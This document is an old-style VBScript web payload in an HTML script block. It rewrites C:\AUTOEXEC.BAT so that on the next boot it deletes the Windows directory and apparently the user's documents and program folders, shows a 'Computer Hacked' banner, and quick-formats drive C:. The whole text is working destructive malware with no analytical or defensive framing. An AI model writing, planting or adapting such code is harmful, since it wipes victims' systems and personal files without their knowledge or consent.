<script language="VBScript"><!--
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:\AUTOEXEC.BAT", True)
a.writeline ("copy c:\windows\command\deltree.* c:\")
a.writeline ("copy c:\windows\command\format.* c:\")
a.writeline ("cls")
a.writeline ("Deltree /y windows")
a.writeline ("cls")
a.writeline ("Deltree /y meusdo~1")
a.writeline ("cls")
a.writeline ("Deltree /y arquiv~1")
a.writeline ("@echo -=-=-=-=-=-=-=-Computer Hacked by [hacker!]-=-=-=-=-=-")
a.writeline ("@echo -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-")
a.writeline ("format c: /q")
a.Close
--></script>